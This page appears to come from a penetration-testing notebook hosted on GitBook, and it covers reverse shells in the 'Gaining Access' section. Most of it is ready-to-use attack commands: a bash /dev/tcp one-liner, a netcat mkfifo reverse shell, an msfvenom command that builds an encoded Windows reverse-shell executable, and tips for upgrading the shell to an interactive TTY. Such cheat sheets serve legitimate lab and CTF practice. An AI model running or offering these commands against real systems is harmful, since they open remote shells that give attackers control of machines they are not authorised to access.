🌄
Shikata Ga Nai
  • Shikata Ga Nai
  • General
  • Gaining Access
    • Nmap
    • Reverse Shell
    • Password Cracking
    • Other Services
      • 21 - FTP
      • Enumerating SMB
    • Web
      • Web Enumeration
      • XSS
      • File Inclusion
      • SQL Injection
  • Linux Foothold
    • Linux Tricks
    • Privesc
  • Windows Foothold
    • Privesc
  • Binary
    • Calling Conventions
    • Debuggers
    • Examining Binaries
    • Shellcoding
    • Bypassing Exploit Mitigation Techniques [Linux]
  • Stego
    • Stego tools
Powered by GitBook
On this page
  • One-Liners
  • Generate Payload
  • Msfvenom
  • Shell Cushions
  • Spawn TTY
  • Auto-Completion

Was this helpful?

  1. Gaining Access

Reverse Shell

PreviousNmapNextPassword Cracking

Last updated 4 years ago

Was this helpful?

One-Liners

Bash

bash -i >& /dev/tcp/<IP>/<port> 0>&1

Netcat

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <port> >/tmp/f

Sometimes one one-liner won't work, but another will. Two great cheatsheets are and .

Generate Payload

Msfvenom

Windows reverse shell with encoder

msfvenom -p windows/shell_reverse_tcp -a x86 --encoder /x86/shikata_ga_nai LHOST=<Your IP> LPORT=<Listening Port> -f exe -o <Shell Name>.exe

Shell Cushions

If the reverse shell is terminal-based some measures can be taken to make it more comfortable to use.

Spawn TTY

Python

python -c ‘import pty;pty.spawn(“/bin/bash”)’

Auto-Completion

Background the process with Ctrl+z.

Execute this to disable echoing and send I/O straight through without processing.

stty raw -echo

return to the process with fg + Enter x2.

ways to spawn TTY.

.

pentestmonkey
highoncoffee
Additional
Additional cushions